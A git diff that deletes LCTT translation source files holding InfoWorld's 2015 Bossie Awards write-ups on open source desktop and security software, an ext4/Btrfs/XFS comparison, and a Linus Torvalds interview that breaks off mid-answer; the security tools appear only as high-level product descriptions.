-Like KeyPass, KeyPassDroid makes creating and accessing passwords easy, requiring you to recall only a single master password. It supports both DES and Twofish algorithms for encrypting all passwords, and it goes a step further by encrypting the entire password database, not only the password fields. Notes and other password pertinent information are encrypted too.
-
-While KeePassDroid's interface is minimal -- dated, some would say -- it gets the job done with bare-bones efficiency. Need to generate passwords that have certain character sets and lengths? KeePassDroid can do that with ease. With more than a million downloads on the Google Play Store, you could say this app definitely fills a need.
-
--- Victor R. Garza
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-prey-100615300-orig.jpg)
-
-### Prey ###
-
-Loss or theft of mobile devices is all too common these days. While there are many tools in the enterprise to manage and erase data either misplaced or stolen from an organization, [Prey][16] facilitates the recovery of the phone, laptop, or tablet, and not just the wiping of potentially sensitive information from the device.
-
-Prey is a Web service that works with an open source installed agent for Linux, OS X, Windows, Android, and iOS devices. Prey tracks your lost or stolen device by using either the device's GPS, the native geolocation provided by newer operating systems, or an associated Wi-Fi hotspot to home in on the location.
-
-If your smartphone is lost or stolen, send a text message to the device to activate Prey. For stolen tablets or laptops, use the Prey Project's cloud-based control panel to select the device as missing. The Prey agent on any device can then take a screenshot of the active applications, turn on the camera to catch a thief's image, reset the device to the factory settings, or fully lock down the device.
-
-Should you want to retrieve your lost items, the Prey Project strongly suggests you contact your local police to have them assist you.
-
--- Victor R. Garza
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-orbot-100615299-orig.jpg)
-
-### Orbot ###
-
-The premiere proxy application for Android, [Orbot][17] leverages the volunteer-operated network of virtual tunnels called Tor (The Onion Router) to keep all communications private. Orbot works with companion applications [Orweb][18] for secure Web browsing and [ChatSecure][19] for secure chat. In fact, any Android app that allows its proxy settings to be changed can be secured with Orbot.
-
-One thing to remember about the Tor network is that it's designed for secure, lightweight communications, not for pulling down torrents or watching YouTube videos. Surfing media-rich sites like Facebook can be painfully slow. Your Orbot communications won't be blazing fast, but they will stay private and confidential.
-
--- Victor R. Garza
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-tails-100615301-orig.jpg)
-
-### Tails ###
-
-[Tails][20], or The Amnesic Incognito Live System, is a Linux Live OS that can be booted from a USB stick, DVD, or SD card. It’s often used covertly in the Deep Web to secure traffic when purchasing illicit substances, but it can also be used to avoid tracking, support freedom of speech, circumvent censorship, and promote liberty.
-
-Leveraging Tor (The Onion Router), Tails keeps all communications secure and private and promises to leave no trace on any computer after it’s used. It performs disk encryption with LUKS, protects instant messages with OTR, encrypts Web traffic with the Tor Browser and HTTPS Everywhere, and securely deletes files via Nautilus Wipe. Tails even has an office suite, image editor, and the like.
-
-Now, it's always possible to be traced while using any system if you're not careful, so be vigilant when using Tails and follow good privacy practices, like turning off JavaScript while using Tor. And be aware that Tails isn't necessarily going to be speedy, even while using a fiber connect, but that's what you pay for anonymity.
-
--- Victor R. Garza
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-main-100614438-orig.jpg)
-
-### Read about more open source winners ###
-
-InfoWorld's Best of Open Source Awards for 2014 celebrate more than 100 open source projects, from the bottom of the stack to the top. Follow these links to more open source winners:
-
-[Bossie Awards 2015: The best open source applications][21]
-
-[Bossie Awards 2015: The best open source application development tools][22]
-
-[Bossie Awards 2015: The best open source big data tools][23]
-
-[Bossie Awards 2015: The best open source data center and cloud software][24]
-
-[Bossie Awards 2015: The best open source desktop and mobile software][25]
-
-[Bossie Awards 2015: The best open source networking and security software][26]
-
---------------------------------------------------------------------------------
-
-via: http://www.infoworld.com/article/2982630/open-source-tools/bossie-awards-2015-the-best-open-source-desktop-and-mobile-software.html
-
-作者:[InfoWorld staff][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.infoworld.com/author/InfoWorld-staff/
-[1]:https://www.libreoffice.org/download/libreoffice-fresh/
-[2]:http://lwn.net/Articles/637735/
-[3]:https://www.mozilla.org/en-US/firefox/new/
-[4]:https://nakedsecurity.sophos.com/2015/06/24/not-ok-google-privacy-advocates-take-on-the-chromium-team-and-win/
-[5]:https://www.mozilla.org/en-US/thunderbird/
-[6]:https://notepad-plus-plus.org/
-[7]:http://www.videolan.org/vlc/index.html
-[8]:http://www.videolan.org/press/vlc-2.2.0.html
-[9]:http://www.7-zip.org/
-[10]:https://handbrake.fr/
-[11]:http://keepass.info/
-[12]:http://www.infoworld.com/article/2931753/open-source-software/sourceforge-the-end-cant-come-too-soon.html
-[13]:https://www.virtualbox.org/
-[14]:https://inkscape.org/en/download/windows/
-[15]:http://www.keepassdroid.com/
-[16]:http://preyproject.com/
-[17]:https://www.torproject.org/docs/android.html.en
-[18]:https://guardianproject.info/apps/orweb/
-[19]:https://guardianproject.info/apps/chatsecure/
-[20]:https://tails.boum.org/
-[21]:http://www.infoworld.com/article/2982622/bossie-awards-2015-the-best-open-source-applications.html
-[22]:http://www.infoworld.com/article/2982920/bossie-awards-2015-the-best-open-source-application-development-tools.html
-[23]:http://www.infoworld.com/article/2982429/bossie-awards-2015-the-best-open-source-big-data-tools.html
-[24]:http://www.infoworld.com/article/2982923/bossie-awards-2015-the-best-open-source-data-center-and-cloud-software.html
-[25]:http://www.infoworld.com/article/2982630/bossie-awards-2015-the-best-open-source-desktop-and-mobile-software.html
-[26]:http://www.infoworld.com/article/2982962/bossie-awards-2015-the-best-open-source-networking-and-security-software.html
\ No newline at end of file
diff --git a/sources/share/20151028 Bossie Awards 2015--The best open source networking and security software.md b/sources/share/20151028 Bossie Awards 2015--The best open source networking and security software.md
deleted file mode 100644
index 129ce3eff4..0000000000
--- a/sources/share/20151028 Bossie Awards 2015--The best open source networking and security software.md
+++ /dev/null
@@ -1,162 +0,0 @@
-Bossie Awards 2015: The best open source networking and security software
-================================================================================
-InfoWorld's top picks of the year among open source tools for building, operating, and securing networks
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-net-sec-100614459-orig.jpg)
-
-### The best open source networking and security software ###
-
-BIND, Sendmail, OpenSSH, Cacti, Nagios, Snort -- open source software seems to have been invented for networks, and many of the oldies and goodies are still going strong. Among our top picks in the category this year, you'll find a mix of stalwarts, mainstays, newcomers, and upstarts perfecting the arts of network management, security monitoring, vulnerability assessment, rootkit detection, and much more.
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-icinga-100614482-orig.jpg)
-
-### Icinga 2 ###
-
-Icinga began life as a fork of system monitoring application Nagios. [Icinga 2][1] was completely rewritten to give users a modern interface, support for multiple databases, and an API to integrate numerous extensions. With out-of-the-box load balancing, notifications, and configuration, Icinga 2 shortens the time to installation for complex environments. Icinga 2 supports Graphite natively, giving administrators real-time performance graphing without any fuss. But what puts Icinga back on the radar this year is its release of Icinga Web 2, a graphical front end with drag-and-drop customizable dashboards and streamlined monitoring tools.
-
-Administrators can view, filter, and prioritize problems, while keeping track of which actions have already been taken. A new matrix view lets administrators view hosts and services on one page. You can view events over a particular time period or filter incidents to understand which ones need immediate attention. Icinga Web 2 may boast a new interface and zippier performance, but all the usual commands from Icinga Classic and Icinga Web are still available. That means there is no downtime trying to learn a new version of the tool.
-
--- Fahmida Rashid
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-zenoss-100614465-orig.jpg)
-
-### Zenoss Core ###
-
-Another open source stalwart, [Zenoss Core][2] gives network administrators a complete, one-stop solution for tracking and managing all of the applications, servers, storage, networking components, virtualization tools, and other elements of an enterprise infrastructure. Administrators can make sure the hardware is running efficiently and take advantage of the modular design to plug in ZenPacks for extended functionality.
-
-Zenoss Core 5, released in February of this year, takes the already powerful tool and improves it further, with an enhanced user interface and expanded dashboard. The Web-based console and dashboards were already highly customizable and dynamic, and the new version now lets administrators mash up multiple component charts onto a single chart. Think of it as the tool for better root cause and cause/effect analysis.
-
-Portlets give additional insights for network mapping, device issues, daemon processes, production states, watch lists, and event views, to name a few. And new HTML5 charts can be exported outside the tool. The Zenoss Control Center allows out-of-band management and monitoring of all Zenoss components. Zenoss Core has new tools for online backup and restore, snapshots and rollbacks, and multihost deployment. Even more important, deployments are faster with full Docker support.
-
--- Fahmida Rashid
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-opennms-100614461-orig.jpg)
-
-### OpenNMS ###
-
-An extremely flexible network management solution, [OpenNMS][3] can handle any network management task, whether it's device management, application performance monitoring, inventory control, or events management. With IPv6 support, a robust alerts system, and the ability to record user scripts to test Web applications, OpenNMS has everything network administrators and testers need. OpenNMS has become, as now a mobile dashboard, called OpenNMS Compass, lets networking pros keep an eye on their network even when they're out and about.
-
-The iOS version of the app, which is available on the [iTunes App Store][4], displays outages, nodes, and alarms. The next version will offer additional event details, resource graphs, and information about IP and SNMP interfaces. The Android version, available on [Google Play][5], displays network availability, outages, and alarms on the dashboard, as well as the ability to acknowledge, escalate, or clear alarms. The mobile clients are compatible with OpenNMS Horizon 1.12 or greater and OpenNMS Meridian 2015.1.0 or greater.
-
--- Fahmida Rashid
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-onion-100614460-orig.jpg)
-
-### Security Onion ###
-
-Like an onion, network security monitoring is made of many layers. No single tool will give you visibility into every attack or show you every reconnaissance or foot-printing session on your company network. [Security Onion][6] bundles scores of proven tools into one handy Ubuntu distro that will allow you to see who's inside your network and help keep the bad guys out.
-
-Whether you're taking a proactive approach to network security monitoring or following up on a potential attack, Security Onion can assist. Consisting of sensor, server, and display layers, the Onion combines full network packet capture with network-based and host-based intrusion detection, and it serves up all of the various logs for inspection and analysis.
-
-The star-studded network security toolchain includes Netsniff-NG for packet capture, Snort and Suricata for rules-based network intrusion detection, Bro for analysis-based network monitoring, OSSEC for host intrusion detection, and Sguil, Squert, Snorby, and ELSA (Enterprise Log Search and Archive) for display, analysis, and log management. It’s a carefully vetted collection of tools, all wrapped in a wizard-driven installer and backed by thorough documentation, that can help you get from zero to monitoring as fast as possible.
-
--- Victor R. Garza
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-kali-100614458-orig.jpg)
-
-Kali Linux
-
-The team behind [Kali Linux][7] revamped the popular security Linux distribution this year to make it faster and even more versatile. Kali sports a new 4.0 kernel, improved hardware and wireless driver support, and a snappier interface. The most popular tools are easily accessible from a dock on the side of the screen. The biggest change? Kali Linux is now a rolling distribution, with a continuous stream of software updates. Kali's core system is based on Debian Jessie, and the team will pull packages continuously from Debian Testing, while continuing to add new Kali-flavored features on top.
-
-The distribution still comes jam-packed with tools for penetration testing, vulnerability analysis, security forensics, Web application analysis, wireless networking and assessment, reverse engineering, and exploitation tools. Now the distribution has an upstream version checking system that will automatically notify users when updates are available for the individual tools. The distribution also features ARM images for a range of devices, including Raspberry Pi, Chromebook, and Odroids, as well as updates to the NetHunter penetration testing platform that runs on Android devices. There are other changes too: Metasploit Community/Pro is no longer included, because Kali 2.0 is not yet [officially supported by Rapid7][8].
-
--- Fahmida Rashid
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-openvas-100614462-orig.jpg)
-
-### OpenVAS ###
-
-[OpenVAS][9], the Open Vulnerability Assessment System, is a framework that combines multiple services and tools to offer vulnerability scanning and vulnerability management. The scanner is coupled with a weekly feed of network vulnerability tests, or you can use a feed from a commercial service. The framework includes a command-line interface (so it can be scripted) and an SSL-secured, browser-based interface via the [Greenbone Security Assistant][10]. OpenVAS accommodates various plug-ins for additional functionality. Scans can be scheduled or run on-demand.
-
-Multiple OpenVAS installations can be controlled through a single master, which makes this a scalable vulnerability assessment tool for enterprises. The project is as compatible with standards as can be: Scan results and configurations are stored in a SQL database, where they can be accessed easily by external reporting tools. Client tools access the OpenVAS Manager via the XML-based stateless OpenVAS Management Protocol, so security administrators can extend the functionality of the framework. The software can be installed from packages or source code to run on Windows or Linux, or downloaded as a virtual appliance.
-
--- Matt Sarrel
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-owasp-100614463-orig.jpg)
-
-### OWASP ###
-
-[OWASP][11], the Open Web Application Security Project, is a nonprofit organization with worldwide chapters focused on improving software security. The community-driven organization provides test tools, documentation, training, and almost anything you could imagine that’s related to assessing software security and best practices for developing secure software. Several OWASP projects have become valuable components of many a security practitioner's toolkit:
-
-[ZAP][12], the Zed Attack Proxy Project, is a penetration test tool for finding vulnerabilities in Web applications. One of the design goals of ZAP was to make it easy to use so that developers and functional testers who aren't security experts can benefit from using it. ZAP provides automated scanners and a set of manual test tools.
-
-The [Xenotix XSS Exploit Framework][13] is an advanced cross-site scripting vulnerability detection and exploitation framework that runs scans within browser engines to get real-world results. The Xenotix Scanner Module uses three intelligent fuzzers, and it can run through nearly 5,000 distinct XSS payloads. An API lets security administrators extend and customize the exploit toolkit.
-
-[O-Saft][14], or the OWASP SSL advanced forensic tool, is an SSL auditing tool that shows detailed information about SSL certificates and tests SSL connections. This command-line tool can run online or offline to assess SSL security such as ciphers and configurations. O-Saft provides built-in checks for common vulnerabilities, and you can easily extend these through scripting. In May 2015 a simple GUI was added as an optional download.
-
-[OWTF][15], the Offensive Web Testing Framework, is an automated test tool that follows OWASP testing guidelines and the NIST and PTES standards. The framework uses both a Web UI and a CLI, and it probes Web and application servers for common vulnerabilities such as improper configuration and unpatched software.
-
--- Matt Sarrel
-
-![](http://core0.staticworld.net/images/article/2015/09/bossies-2015-beef-100614456-orig.jpg)
-
-### BeEF ###
-
-The Web browser has become the most common vector for attacks against clients. [BeEF][15], the Browser Exploitation Framework Project, is a widely used penetration tool to assess Web browser security. BeEF helps you expose the security weaknesses of client systems using client-side attacks launched through the browser. BeEF sets up a malicious website, which security administrators visit from the browser they want to test. BeEF then sends commands to attack the Web browser and use it to plant software on the client machine. Administrators can then launch attacks on the client machine as if they were zombies.
-
-BeEF comes with commonly used modules like a key logger, a port scanner, and a Web proxy, plus you can write your own modules or send commands directly to the zombified test machine. BeEF comes with a handful of demo Web pages to help you get started and makes it very easy to write additional Web pages and attack modules so you can customize testing to your environment. BeEF is a valuable test tool for assessing browser and endpoint security and for learning how browser-based attacks are launched. Use it to put together a demo to show your users how malware typically infects client devices.
-
--- Matt Sarrel
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-unhide-100614464-orig.jpg)
-
-### Unhide ###
-
-[Unhide][16] is a forensic tool that locates open TCP/UDP ports and hidden process on UNIX, Linux, and Windows. Hidden ports and processes can be the result of rootkit or LKM (loadable kernel module) activity. Rootkits can be difficult to find and remove because they are designed to be stealthy, hiding themselves from the OS and user. A rootkit can use LKMs to hide its processes or impersonate other processes, allowing it to run on machines undiscovered for a long time. Unhide can provide the assurance that administrators need to know their systems are clean.
-
-Unhide is really two separate scripts: one for processes and one for ports. The tool interrogates running processes, threads, and open ports and compares this info to what's registered with the system as active, reporting discrepancies. Unhide and WinUnhide are extremely lightweight scripts that run from the command line to produce text output. They're not pretty, but they are extremely useful. Unhide is also included in the [Rootkit Hunter][17] project.
-
--- Matt Sarrel
-
-![](http://images.techhive.com/images/article/2015/09/bossies-2015-main-100614457-orig.jpg)
-
-Read about more open source winners
-
-InfoWorld's Best of Open Source Awards for 2014 celebrate more than 100 open source projects, from the bottom of the stack to the top. Follow these links to more open source winners:
-
-[Bossie Awards 2015: The best open source applications][18]
-
-[Bossie Awards 2015: The best open source application development tools][19]
-
-[Bossie Awards 2015: The best open source big data tools][20]
-
-[Bossie Awards 2015: The best open source data center and cloud software][21]
-
-[Bossie Awards 2015: The best open source desktop and mobile software][22]
-
-[Bossie Awards 2015: The best open source networking and security software][23]
-
---------------------------------------------------------------------------------
-
-via: http://www.infoworld.com/article/2982962/open-source-tools/bossie-awards-2015-the-best-open-source-networking-and-security-software.html
-
-作者:[InfoWorld staff][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.infoworld.com/author/InfoWorld-staff/
-[1]:https://www.icinga.org/icinga/icinga-2/
-[2]:http://www.zenoss.com/
-[3]:http://www.opennms.org/
-[4]:https://itunes.apple.com/us/app/opennms-compass/id968875097?mt=8
-[5]:https://play.google.com/store/apps/details?id=com.opennms.compass&hl=en
-[6]:http://blog.securityonion.net/p/securityonion.html
-[7]:https://www.kali.org/
-[8]:https://community.rapid7.com/community/metasploit/blog/2015/08/12/metasploit-on-kali-linux-20
-[9]:http://www.openvas.org/
-[10]:http://www.greenbone.net/
-[11]:https://www.owasp.org/index.php/Main_Page
-[12]:https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
-[13]:https://www.owasp.org/index.php/O-Saft
-[14]:https://www.owasp.org/index.php/OWASP_OWTF
-[15]:http://www.beefproject.com/
-[16]:http://www.unhide-forensics.info/
-[17]:http://www.rootkit.nl/projects/rootkit_hunter.html
-[18]:http://www.infoworld.com/article/2982622/bossie-awards-2015-the-best-open-source-applications.html
-[19]:http://www.infoworld.com/article/2982920/bossie-awards-2015-the-best-open-source-application-development-tools.html
-[20]:http://www.infoworld.com/article/2982429/bossie-awards-2015-the-best-open-source-big-data-tools.html
-[21]:http://www.infoworld.com/article/2982923/bossie-awards-2015-the-best-open-source-data-center-and-cloud-software.html
-[22]:http://www.infoworld.com/article/2982630/bossie-awards-2015-the-best-open-source-desktop-and-mobile-software.html
-[23]:http://www.infoworld.com/article/2982962/bossie-awards-2015-the-best-open-source-networking-and-security-software.html
\ No newline at end of file
diff --git a/sources/share/20151204 Review EXT4 vs. Btrfs vs. XFS.md b/sources/share/20151204 Review EXT4 vs. Btrfs vs. XFS.md
deleted file mode 100644
index f6e40d4286..0000000000
--- a/sources/share/20151204 Review EXT4 vs. Btrfs vs. XFS.md
+++ /dev/null
@@ -1,66 +0,0 @@
-bazz2222222222222222222222222222222222222222222
-Review EXT4 vs. Btrfs vs. XFS
-================================================================================
-![](http://1426826955.rsc.cdn77.org/wp-content/uploads/2015/09/1385698302_funny_linux_wallpapers-593x445.jpg)
-
-To be honest, one of the things that comes last in people’s thinking is to look at which file system on their PC is being used. Windows users as well as Mac OS X users even have less reason for looking as they have really only 1 choice for their operating system which are NTFS and HFS+. Linux operating system, on the other side, has plenty of various file system options, with the current default is being widely used ext4. However, there is another push for changing the file system to something other which is called btrfs. But what makes btrfs better, what are other file systems, and when can we see the distributions making the change?
-
-Let’s first have a general look at file systems and what they really do, then we will make a small comparison between famous file systems.
-
-### So, What Do File Systems Do? ###
-
-Just in case if you are unfamiliar about what file systems really do, it is actually simple when it is summarized. The file systems are mainly used in order for controlling how the data is stored after any program is no longer using it, how access to the data is controlled, what other information (metadata) is attached to the data itself, etc. I know that it does not sound like an easy thing to be programmed, and it is definitely not. The file systems are continually still being revised for including more functionality while becoming more efficient in what it simply needs to do. Therefore, however, it is a basic need for all computers, it is not quite as basic as it sounds like.
-
-### Why Partitioning? ###
-
-Many people have a vague knowledge of what the partitions are since each operating system has an ability for creating or removing them. It can seem strange that Linux operating system uses more than 1 partition on the same disk, even while using the standard installation procedure, so few explanations are called for them. One of the main goals of having different partitions is achieving higher data security in the disaster case.
-
-By dividing your hard disk into partitions, the data may be grouped and also separated. When the accidents occur, only the data stored in the partition which got the hit will only be damaged, while data on the other partitions will survive most likely. These principles date from the days when the Linux operating system didn’t have a journaled file system and any power failure might have led to a disaster.
-
-The using of partitions will remain for security and the robustness reasons, then the breach on 1 part of the operating system does not automatically mean that whole computer is under risk or danger. This is currently most important factor for the partitioning process. For example, the users create scripts, the programs or web applications which start filling up the disk. If that disk contains only 1 big partition, then entire system may stop functioning if that disk is full. If the users store data on separate partitions, then only that data partition can be affected, while system partitions and the possible other data partitions will keep functioning.
-
-Mind that to have a journaled file system will only provide data security in case if there is a power failure as well as sudden disconnection of the storage devices. Such will not protect the data against the bad blocks and the logical errors in the file system. In such cases, the user should use a Redundant Array of Inexpensive Disks (RAID) solution.
-
-### Why Switch File Systems? ###
-
-The ext4 file system has been an improvement for the ext3 file system that was also an improvement over the ext2 file system. While the ext4 is a very solid file system which has been the default choice for almost all distributions for the past few years, it is made from an aging code base. Additionally, Linux operating system users are seeking many new different features in file systems which ext4 does not handle on its own. There is software which takes care of some of such needs, but in the performance aspect, being able to do such things on the file system level could be faster.
-
-### Ext4 File System ###
-
-The ext4 has some limits which are still a bit impressive. The maximum file size is 16 tebibytes (which is roughly 17.6 terabytes) and is much bigger than any hard drive a regular consumer can currently buy. While, the largest volume/partition you can make with ext4 is 1 exbibyte (which is roughly 1,152,921.5 terabytes). The ext4 is known to bring the speed improvements over ext3 by using multiple various techniques. Like in the most modern file systems, it is a journaling file system that means that it will keep a journal of where the files are mainly located on the disk and of any other changes that happen to the disk. Regardless all of its features, it doesn’t support the transparent compression, the data deduplication, or the transparent encryption. The snapshots are supported technically, but such feature is experimental at best.
-
-### Btrfs File System ###
-
-The btrfs, many of us pronounce it different ways, as an example, Better FS, Butter FS, or B-Tree FS. It is a file system which is completely made from scratch. The btrfs exists because its developers firstly wanted to expand the file system functionality in order to include snapshots, pooling, as well as checksums among the other things. While it is independent from the ext4, it also wants to build off the ideas present in the ext4 that are great for the consumers and the businesses alike as well as incorporate those additional features that will benefit everybody, but specifically the enterprises. For the enterprises who are using very large programs with very large databases, they are having a seemingly continuous file system across the multiple hard drives could be very beneficial as it will make a consolidation of the data much easier. The data deduplication could reduce the amount of the actual space data could occupy, and the data mirroring could become easier with the btrfs as well when there is a single and broad file system which needs to be mirrored.
-
-The user certainly can still choose to create multiple partitions so that he does not need to mirror everything. Considering that the btrfs will be able for spanning over the multiple hard drives, it is a very good thing that it can support 16 times more drive space than the ext4. A maximum partition size of the btrfs file system is 16 exbibytes, as well as maximum file size is 16 exbibytes too.
-
-### XFS File System ###
-
-The XFS file system is an extension of the extent file system. The XFS is a high-performance 64-bit journaling file system. The support of the XFS was merged into Linux kernel in around 2002 and In 2009 Red Hat Enterprise Linux version 5.4 usage of the XFS file system. XFS supports maximum file system size of 8 exbibytes for the 64-bit file system. There is some comparison of XFS file system is XFS file system can’t be shrunk and poor performance with deletions of the large numbers of files. Now, the RHEL 7.0 uses XFS as the default filesystem.
-
-### Final Thoughts ###
-
-Unfortunately, the arrival date for the btrfs is not quite known. But officially, the next-generation file system is still classified as “unstable”, but if the user downloads the latest version of Ubuntu, he will be able to choose to install on a btrfs partition. When the btrfs will be classified actually as “stable” is still a mystery, but users shouldn’t expect the Ubuntu to use the btrfs by default until it’s indeed considered “stable”. It has been reported that Fedora 18 will use the btrfs as its default file system as by the time of its release a file system checker for the btrfs should exist. There is a good amount of work still left for the btrfs, as not all the features are yet implemented and the performance is a little sluggish if we compare it to the ext4.
-
-So, which is better to use? Till now, the ext4 will be the winner despite the identical performance. But why? The answer will be the convenience as well as the ubiquity. The ext4 is still excellent file system for the desktop or workstation use. It is provided by default, so the user can install the operating system on it. Also, the ext4 supports volumes up to 1 Exabyte and files up to 16 Terabyte in size, so there’s still a plenty of room for the growth where space is concerned.
-
-The btrfs might offer greater volumes up to 16 Exabyte and improved fault tolerance, but, till now, it feels more as an add-on file system rather than one integrated into the Linux operating system. For example, the btrfs-tools have to be present before a drive will be formatted with the btrfs, which means that the btrfs is not an option during the Linux operating system installation though that could vary with the distribution.
-
-Even though the transfer rates are so important, there’s more to a just file system than speed of the file transfers. The btrfs has many useful features such as Copy-on-Write (CoW), extensive checksums, snapshots, scrubbing, self-healing data, deduplication, as well as many more good improvements that ensure the data integrity. The btrfs lacks the RAID-Z features of ZFS, so the RAID is still in an experimental state with the btrfs. For pure data storage, however, the btrfs is the winner over the ext4, but time still will tell.
-
-Till the moment, the ext4 seems to be a better choice on the desktop system since it is presented as a default file system, as well as it is faster than the btrfs when transferring files. The btrfs is definitely worth to look into, but to completely switch to replace the ext4 on desktop Linux might be few years later. The data farms and the large storage pools could reveal different stories and show the right differences between ext4, XCF, and btrfs.
-
-If you have a different or additional opinion, kindly let us know by commenting on this article.
-
---------------------------------------------------------------------------------
-
-via: http://www.unixmen.com/review-ext4-vs-btrfs-vs-xfs/
-
-作者:[M.el Khamlichi][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://www.unixmen.com/author/pirat9/
diff --git a/sources/talk/20150709 Interviews--Linus Torvalds Answers Your Question.md b/sources/talk/20150709 Interviews--Linus Torvalds Answers Your Question.md
deleted file mode 100644
index bb04ddf0c8..0000000000
--- a/sources/talk/20150709 Interviews--Linus Torvalds Answers Your Question.md
+++ /dev/null
@@ -1,184 +0,0 @@
-Interviews: Linus Torvalds Answers Your Question
-================================================================================
-Last Thursday you had a chance to [ask Linus Torvalds][1] about programming, hardware, and all things Linux. You can read his answers to those questions below. If you'd like to see what he had to say the last time we sat down with him, [you can do so here][2].
-
-**Productivity**
-by DoofusOfDeath
-
-> You've somehow managed to originate two insanely useful pieces of software: Linux, and Git. Do you think there's anything in your work habits, your approach to choosing projects, etc., that have helped you achieve that level of productivity? Or is it just the traditional combination of talent, effort, and luck?
-
-**Linus**: I'm sure it's pretty much always that "talent, effort and luck". I'll leave it to others to debate how much of each...
-
-I'd love to point out some magical work habit that makes it all happen, but I doubt there really is any. Especially as the work habits I had wrt the kernel and Git have been so different.
-
-With Git, I think it was a lot about coming at a problem with fresh eyes (not having ever really bought into the traditional SCM mindset), and really trying to think about the issues, and spending a fair amount of time thinking about what the real problems were and what I wanted the design to be. And then the initial self-hosting code took about a day to write (ok, that was "self-hosting" in only the weakest sense, but still).
-
-And with Linux, obviously, things were very different - the big designs came from the outside, and it took half a year to host itself, and it hadn't even started out as a kernel to begin with. Clearly not a lot of thinking ahead and planning involved ;). So very different circumstances indeed.
-
-What both the kernel and Git have, and what I think is really important (and I guess that counts as a "work habit"), is a maintainer that stuck to it, and was responsive, responsible and sane. Too many projects falter because they don't have people that stick with them, or have people who have an agenda that doesn't match reality or the user expectations.
-
-But it's very important to point out that for Git, that maintainer was not me. Junio Hamano really should get pretty much all the credit for Git. Credit where credit is due. I'll take credit for the initial implementation and design of Git - it may not be perfect, but ten years on it still is very solid and very clearly the same basic design. But I'll take even _more_ credit for recognizing that Junio had his head screwed on right, and was the person to drive the project. And all the rest of the credit goes to him.
-
-Of course, that kind of segues into something else the kernel and Git do have in common: while I still maintain the kernel, I did end up finding a lot of smart people to maintain all the different parts of it. So while one important work habit is that "stick to it" persistence that you need to really take a project from a not-quite-usable prototype to something bigger and better, another important work-habit is probably to also "let go" and not try to own and control the project too much. Let other people really help you - guide the process but don't get in their way.
-
-**init system**
-by lorinc
-
-> There wasn't a decent unix-like kernel, you wrote one which ultimately became the most used. There wasn't a decent version control software, you wrote one which ultimately became the most love. Do you think we already have a decent init system, or do you have plan to write one that will ultimately settle the world on that hot topic?
-
-**Linus**: You can say the word "systemd", It's not a four-letter word. Seven letters. Count them.
-
-I have to say, I don't really get the hatred of systemd. I think it improves a lot on the state of init, and no, I don't see myself getting into that whole area.
-
-Yeah, it may have a few odd corners here and there, and I'm sure you'll find things to despise. That happens in every project. I'm not a huge fan of the binary logging, for example. But that's just an example. I much prefer systemd's infrastructure for starting services over traditional init, and I think that's a much bigger design decision.
-
-Yeah, I've had some personality issues with some of the maintainers, but that's about how you handle bug reports and accept blame (or not) for when things go wrong. If people thought that meant that I dislike systemd, I will have to disappoint you guys.
-
-**Can Valve change the Linux gaming market?**
-by Anonymous Coward
-
-> Do you think Valve is capable of making Linux a primary choice for gamers?
-
-**Linus**: "Primary"? Probably not where it's even aiming. I think consoles (and all those handheld and various mobile platforms that "real gamers" seem to dismiss as toys) are likely much more primary, and will stay so.
-
-I think Valve wants to make sure they can control their own future, and Linux and ValveOS is probably partly to explore a more "console-like" Valve experience (ie the whole "get a box set up for a single main purpose", as opposed to a more PC-like experience), and partly as a "second source" against Microsoft, who is a competitor in the console area. Keeping your infrastructure suppliers honest by making sure you have alternatives sounds like a good strategy, and particularly so when those suppliers may be competing with you directly elsewhere.
-
-So I don't think the aim is really "primary". "Solid alternative" is I think the aim. Of course, let's see where it goes after that.
-
-But I really have not been involved. People like Greg and the actual graphics driver guys have been in much more direct contact with Valve. I think it's great to see gaming on Linux, but at the same time, I'm personally not really much of a gamer.
-
-**The future of RT-Linux?**
-by nurhussein
-
-> According to Thomas Gleixner, [the future of the realtime patchset to Linux is in doubt][2], as it is difficult to secure funding from interested parties on this functionality even though it is both useful and important: What are your thoughts on this, and what do you think we need to do to get more support behind the RT patchset, especially considering Linux's increasing use in embedded systems where realtime functionality is undoubtedly useful.
-
-**Linus**: So I think this is one of those things where the markets decide how important rtLinux ends up being, and I suspect there are more than enough companies who end up wanting and using rtLinux that the project isn't really going anywhere. The complaints by Thomas were - I think - a wake-up call to the companies who end up wanting the extended hard realtime patches.
-
-So I suspect there are companies and groups like OSADL that end up funding and helping with rtLinux, and that it isn't going away.
-
-**Rigor and developments**
-by hcs_$reboot
-
-> The most complex program running on a machine is arguably its OS, especially the kernel. Linux (kernel) reached the top level in terms of performance, reliability and versatility. You have been criticized quite a few times for some virulent mails addressed to developers. Do you think Linux would be where it is without managing the project with an iron fist? To go further, do you think some other main OSS project would benefit from a more rigorous management approach?
-
-**Linus**: One of the nice things about open source is how it allows people to really concentrate on what they are good at, and it has been a huge advantage for Linux that we've had people who are interested in the marketing side and selling Linux, as well as the legal side etc.
-
-And that is all in addition, of course, to the original "we're motivated by the technology" people like me. And even within that "we're motivated by technology" group, you most certainly don't need to find _everything_ interesting, you can find the area you are passionate about and really care about and want to work on.
-
-That's _fundamentally_ how open source works.
-
